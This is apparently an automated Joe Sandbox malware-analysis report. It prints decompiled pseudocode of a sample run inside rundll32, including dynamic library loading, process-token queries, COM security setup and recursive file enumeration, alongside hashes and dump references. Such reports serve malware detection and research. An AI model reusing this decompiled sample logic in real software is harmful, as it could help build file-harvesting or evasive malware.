CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,041B1005), ref: 041B14FE
Sleep.KERNEL32(000007D0), ref: 041B1558

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: InitializeSleep
String ID:
API String ID: 4203272843-0
Opcode ID: 595e53b1b8a73fb479ad6d7f3c3c414799ffcc1e55ae6035ef2a25cd732f5405
Instruction ID: 4a792ca9b1dcd05a85fe6d197b27483f0a981902e680d5d6b2c0cd70753b6f8c
Opcode Fuzzy Hash: 595e53b1b8a73fb479ad6d7f3c3c414799ffcc1e55ae6035ef2a25cd732f5405
Instruction Fuzzy Hash: AD31C6B1601200BFE714EF65DDD8EE67BE8EB0A398F1684A5F54297140D774BD8187E0

Uniqueness

Uniqueness Score: -1.00%

Function 041B9491 Relevance: 3.0, APIs: 2, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E041B9491(void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ecx;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t23;
				void* _t26;

				_push(_t15);
				_t23 = __edx;
				_t13 = _t15;
				_t5 = E041B90CA(_t15, _a4);
				_t26 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x26e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t11 = E041B9446(_t13, _t23, _t7); // executed
					_t26 = _t11;
				}
				E041B9D4C( &_v8);
				return _t26;
			}

0x041b9494
0x041b949b
0x041b949d
0x041b949f
0x041b94a5
0x041b94a7
0x041b94b1
0x041b94b2
0x041b94c1
0x041b94b4
0x041b94b4
0x041b94b4
0x041b94c5
0x041b94cc
0x041b94d2
0x041b94d2
0x041b94d8
0x041b94e4

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?,041CD870,?,041B15E8,0000026E,041B149D,?,?,041B1005), ref: 041B94B4
LoadLibraryA.KERNELBASE(00000000,?,?,?,041CD870,?,041B15E8,0000026E,041B149D,?,?,041B1005), ref: 041B94C1

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: d7ae43458d3cf51e03a29db98044d4aa7d6bca013057ea03b996e43fe9055bf8
Instruction ID: 835b73e2437b3a5135ffad38189f9a6043442922e00491f4196493066fb9cb0a
Opcode Fuzzy Hash: d7ae43458d3cf51e03a29db98044d4aa7d6bca013057ea03b996e43fe9055bf8
Instruction Fuzzy Hash: 42F02EB2714214AFDB145F6AE8C48CF7BECDF442A4710402AF545C7240DF70EC4186D0

Uniqueness

Uniqueness Score: -1.00%

Function 041B1000 Relevance: 3.0, APIs: 2, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E041B1000() {
				void* _t4;
				void* _t5;

				E041B1494(_t4, _t5);
				ExitProcess(0);
			}

0x041b1000
0x041b100c

APIs

ExitProcess.KERNEL32(00000000), ref: 041B100C

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 99b9329cdac05f378602205d560317d893431fe8356453e7186f978cab65b3b1
Instruction ID: 5622e4689e9e74f96103f34361409b940186c2a116cb1afb45b9c685d67c0d4e
Opcode Fuzzy Hash: 99b9329cdac05f378602205d560317d893431fe8356453e7186f978cab65b3b1
Instruction Fuzzy Hash: 8FB012702020409FEB009B70D448FAD37D0EB0C346F4A8CA0F145CE045DB205440C710

Uniqueness

Uniqueness Score: -1.00%

Function 041BDC83 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E041BDC83(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E041BDB58(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E041BDBAF(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E041B913B( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x41d0fc8; // 0x439fb00
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x41d0fc8; // 0x439fb00
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x41d0fc8; // 0x439fb00
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x041bdc8a
0x041bdc8c
0x041bdc93
0x041bdc95
0x041bdc98
0x041bdc9d
0x041bdca2
0x041bdcac
0x041bdcaf
0x041bdcb2
0x041bdcb7
0x041bdcb9
0x041bdcbf
0x041bdd1f
0x041bdd27
0x041bdd2d
0x041bdd34
0x041bdd3a
0x00000000
0x041bdd3b
0x041bdcc4
0x041bdcc5
0x041bdcc6
0x041bdcc7
0x041bdcc8
0x041bdcc9
0x041bdcca
0x041bdccb
0x041bdcd0
0x041bdcd2
0x041bdcd7
0x041bdcd8
0x041bdce2
0x00000000
0x00000000
0x041bdce6
0x041bdd12
0x041bdd12
0x041bdd1a
0x041bdd1d
0x00000000
0x041bdd1d
0x041bdce8
0x041bdce8
0x041bdceb
0x041bdcee
0x041bdcee
0x041bdcf1
0x041bdcf3
0x041bdcfd
0x00000000
0x00000000
0x041bdd02
0x041bdd03
0x041bdd06
0x041bdd0b
0x00000000
0x00000000
0x00000000
0x041bdd0d
0x041bdd11
0x00000000
0x041bdd11
0x041bdd40

APIs

Part of subcall function 041BDB58: GetCurrentThread.KERNEL32 ref: 041BDB6B
Part of subcall function 041BDB58: OpenThreadToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB72
Part of subcall function 041BDB58: GetLastError.KERNEL32(?,?,041BDC9D,00000000,041B0000), ref: 041BDB79
Part of subcall function 041BDB58: OpenProcessToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB9E

Part of subcall function 041BDBAF: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,041B0000,00000000,00000000,?,041BDC30,00000000,00000000,?,041BDC59), ref: 041BDBCA
Part of subcall function 041BDBAF: GetLastError.KERNEL32(?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDBD1

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,041B0000), ref: 041BDD27

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
String ID:
API String ID: 1806447117-0
Opcode ID: 65ca902ff5055b3309582c66f9fb02c8b7dcb86631bdb79639da08c15d1a12a8
Instruction ID: 32386cd0a3404ffb379b4eb764037773de5a595601b72e9c2c890ed51b8355d0
Opcode Fuzzy Hash: 65ca902ff5055b3309582c66f9fb02c8b7dcb86631bdb79639da08c15d1a12a8
Instruction Fuzzy Hash: BD215371A01205AFDB18DFA5E8C5EEEBBB8EF48714F604469E581E7190D730A9419B90

Uniqueness

Uniqueness Score: -1.00%

Function 041BDC33 Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E041BDC33(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x41d0fc8; // 0x439fb00
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E041BDC1C(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x41d0fa0; // 0x439f8a0
							 *((intOrPtr*)(_t18 + 0x34))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}

0x041bdc37
0x041bdc3f
0x041bdc47
0x041bdc4c
0x041bdc54
0x041bdc59
0x041bdc5d
0x041bdc7b
0x041bdc7e
0x041bdc5f
0x041bdc62
0x041bdc64
0x041bdc6c
0x041bdc6c
0x041bdc6f
0x041bdc6f
0x041bdc82
0x041bdc4f
0x041bdc4f
0x041bdc4f

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc86cde3ffbc8d5ee8fcd4847d321be8902efc71f8feb4186231d8a414df2b50
Instruction ID: 019b0d6ac913e8cbad63accd23891baf28c07741ceb18a999e9705c889558e1e
Opcode Fuzzy Hash: fc86cde3ffbc8d5ee8fcd4847d321be8902efc71f8feb4186231d8a414df2b50
Instruction Fuzzy Hash: BDF09A71A02104EFCB1ADBA5E982ADE7BB8EB08349F5500A8F141E7150D774EE40EB90

Uniqueness

Uniqueness Score: -1.00%

Function 041B911F Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E041B911F(long _a4) {
				void* _t2;
				void* _t3;

				_t2 =  *0x41d10a4;
				if(_t2 != 0) {
					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
					return _t3;
				} else {
					return _t2;
				}
			}

0x041b9122
0x041b9129
0x041b9133
0x041b913a
0x041b912c
0x041b912c
0x041b912c

APIs

RtlAllocateHeap.NTDLL(?,00000008,?,?,041B9C58,?,00000144,?,041CD870), ref: 041B9133

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4933c88fc38c9b869654fb90b058d761e2c8e4ad8e6d66b80ff489f2d7682e38
Instruction ID: 409c430d32fd237d1be96c8a09f3150a679c5d412543d5efc90673a30643e5dd
Opcode Fuzzy Hash: 4933c88fc38c9b869654fb90b058d761e2c8e4ad8e6d66b80ff489f2d7682e38
Instruction Fuzzy Hash: CEC080B524030CA7DF101D95FC04FD13B5CDB04595F004040F70CC5101D735F8505690

Uniqueness

Uniqueness Score: -1.00%

Function 041B910A Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E041B910A() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x41d10a4 = _t1;
				return _t1;
			}

0x041b9113
0x041b9119
0x041b911e

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,041B1030), ref: 041B9113

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e126d80b8c6e7549c1282c76ab23acf66a3f2306e4a4c7686b25d17f1e3ff7cd
Instruction ID: 2fed565fb8454128329bdcf350fc159289255a8bbf5185b27dedc32e04f5850e
Opcode Fuzzy Hash: e126d80b8c6e7549c1282c76ab23acf66a3f2306e4a4c7686b25d17f1e3ff7cd
Instruction Fuzzy Hash: 01B012B4683300AAD6101B21AD06B023D50DB40B82F140200B301DC1C0C6B914509504

Uniqueness

Uniqueness Score: -1.00%

Function 041BB48B Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E041BB48B(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E041BC30F(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x041bb48e
0x041bb48f
0x041bb492
0x041bb495
0x041bb49a
0x041bb49d
0x041bb4a0
0x041bb4a0
0x041bb4a8
0x041bb4ad
0x041bb4b0
0x041bb4b3
0x041bb4b6
0x041bb4b9
0x041bb4cc
0x041bb4cd
0x041bb4d0
0x041bb4d6
0x041bb4d9
0x041bb4dc
0x00000000
0x00000000
0x041bb4de
0x00000000
0x041bb4dc
0x041bb4e2
0x041bb4e2
0x041bb4e4
0x041bb4e4
0x041bb4e7
0x041bb4e7
0x041bb4ec
0x041bb4f4
0x041bb500

APIs

Sleep.KERNELBASE(0000000A), ref: 041BB4F4

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9864d19caf3000827d114e72d730fb892f31c9cf7f91dc800c66892bc04c38a0
Instruction ID: 3698edc2c5483b4830d9d25802f500ac9c8e17ee8a9235747322be14679ca4d8
Opcode Fuzzy Hash: 9864d19caf3000827d114e72d730fb892f31c9cf7f91dc800c66892bc04c38a0
Instruction Fuzzy Hash: 2E112171608305AFDB14CF55D5C5A99B7E8FF48324F108469E99ADBB40D374F940CB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 041BD213 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E041BD213(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x41cd848, 0, 1, 0x41cd858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E041B911F(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x041bd220
0x041bd223
0x041bd226
0x041bd237
0x041bd23d
0x041bd24e
0x041bd256
0x041bd2a7
0x041bd2a7
0x041bd2ac
0x041bd2b1
0x041bd2b1
0x041bd2b4
0x041bd2b9
0x041bd2be
0x041bd2be
0x041bd2c1
0x041bd258
0x041bd259
0x041bd25f
0x041bd270
0x041bd275
0x00000000
0x041bd277
0x041bd284
0x041bd28c
0x00000000
0x041bd28e
0x041bd290
0x041bd298
0x00000000
0x041bd29a
0x041bd29d
0x041bd2a3
0x041bd2a3
0x041bd298
0x041bd28c
0x041bd275
0x041bd2c6

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD226
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD237
CoCreateInstance.OLE32(041CD848,00000000,00000001,041CD858,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD24E
SysAllocString.OLEAUT32(00000000), ref: 041BD259
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,041BD3CE,00000EFA,00000000,00000000,00000005), ref: 041BD284

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
String ID:
API String ID: 3531828250-0
Opcode ID: 682021cbe313bcd221ffe4162cf0cba474dfcdd3868c3fd96b9756babfd3696a
Instruction ID: a272cca6b4d1e5bcc38d7c84e962072f130adca12dd39d6fd8b54bee76ce2021
Opcode Fuzzy Hash: 682021cbe313bcd221ffe4162cf0cba474dfcdd3868c3fd96b9756babfd3696a
Instruction Fuzzy Hash: 5621FC70600285BFE7299B97EC8DE9BBF7CEFC6B55F10019CF54196290D770A940CA60

Uniqueness

Uniqueness Score: -1.00%

Function 041B9DA8 Relevance: 3.1, APIs: 2, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E041B9DA8(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E041B9924(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E041B913B( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E041B9D80( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push("\\");
						_t60 = E041B9924(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x41d0fa0; // 0x439f8a0
							 *((intOrPtr*)(_t54 + 0xc4))(1);
							_push(1);
							_push(1);
							_push(0);
							E041B9DA8(_t60, _t75, 1, 5, E041C0A46, _a16);
							_t63 = _t63 + 0x1c;
							E041B913B( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_push( *((intOrPtr*)(_t61 + 0x41d10cc)));
						_push( &(_v608.cFileName));
						_t41 =  *0x41d0fe0; // 0x439fbe0
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E041C0A46(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x41d0fa0; // 0x439f8a0
						 *((intOrPtr*)(_t46 + 0xc4))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x41d0fa0; // 0x439f8a0
				 *((intOrPtr*)(_t31 + 0x84))(_t59);
				goto L14;
			}

0x041b9da8
0x041b9db4
0x041b9db6
0x041b9db8
0x041b9dbe
0x041b9dc3
0x041b9dc6
0x041b9dcb
0x041b9ee7
0x041b9ee7
0x041b9ddf
0x041b9de4
0x041b9ed6
0x00000000
0x00000000
0x00000000
0x00000000
0x041b9dea
0x041b9dea
0x041b9df7
0x00000000
0x00000000
0x041b9e05
0x041b9e58
0x041b9e58
0x041b9e60
0x041b9e61
0x041b9e6c
0x041b9e6e
0x041b9e71
0x041b9e76
0x041b9e78
0x041b9e80
0x041b9e86
0x041b9e88
0x041b9e8a
0x041b9e9f
0x041b9ea4
0x041b9ead
0x041b9eb3
0x00000000
0x041b9e76
0x041b9e07
0x041b9e09
0x041b9e09
0x041b9e15
0x041b9e16
0x041b9e20
0x00000000
0x00000000
0x041b9e2d
0x041b9e32
0x041b9e37
0x00000000
0x00000000
0x041b9e39
0x041b9e40
0x041b9e46
0x041b9e46
0x041b9e49
0x041b9e56
0x00000000
0x00000000
0x00000000
0x041b9eb4
0x041b9ec2
0x041b9eca
0x041b9ed0
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 041B9DD9
FindNextFileW.KERNEL32(00000000,?), ref: 041B9EBC

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 164897eb4669eca5b40740860906a1c7f91570001fad81b98410601a34e709c6
Instruction ID: 0e75d028bc1d4252f923ee83915a5500db84b0fe26d7ede5a2f4fc2843ac2532
Opcode Fuzzy Hash: 164897eb4669eca5b40740860906a1c7f91570001fad81b98410601a34e709c6
Instruction Fuzzy Hash: 0331E5B1B102156FEB209BA5DCC9FEF37A8EB44754F1400A4FA48A61C0F775B942CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 041BC2D1 Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,041B1CDE,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 041BC2DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 041BC2FE

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 9f701d86488ffaf8c03d493c1b4ef027ec39a9d828071f885d7f8a138d2bb611
Instruction ID: 03a27191c091a645d12b72a85b157d7f77edf1623cb7b532dd6dc745460d372e
Opcode Fuzzy Hash: 9f701d86488ffaf8c03d493c1b4ef027ec39a9d828071f885d7f8a138d2bb611
Instruction Fuzzy Hash: F4E0DFB6800318AFD720AF68DE45B9ABBBCEB80B04F004558AC81B3304E270BE0886D0

Uniqueness

Uniqueness Score: -1.00%

Function 041BB883 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

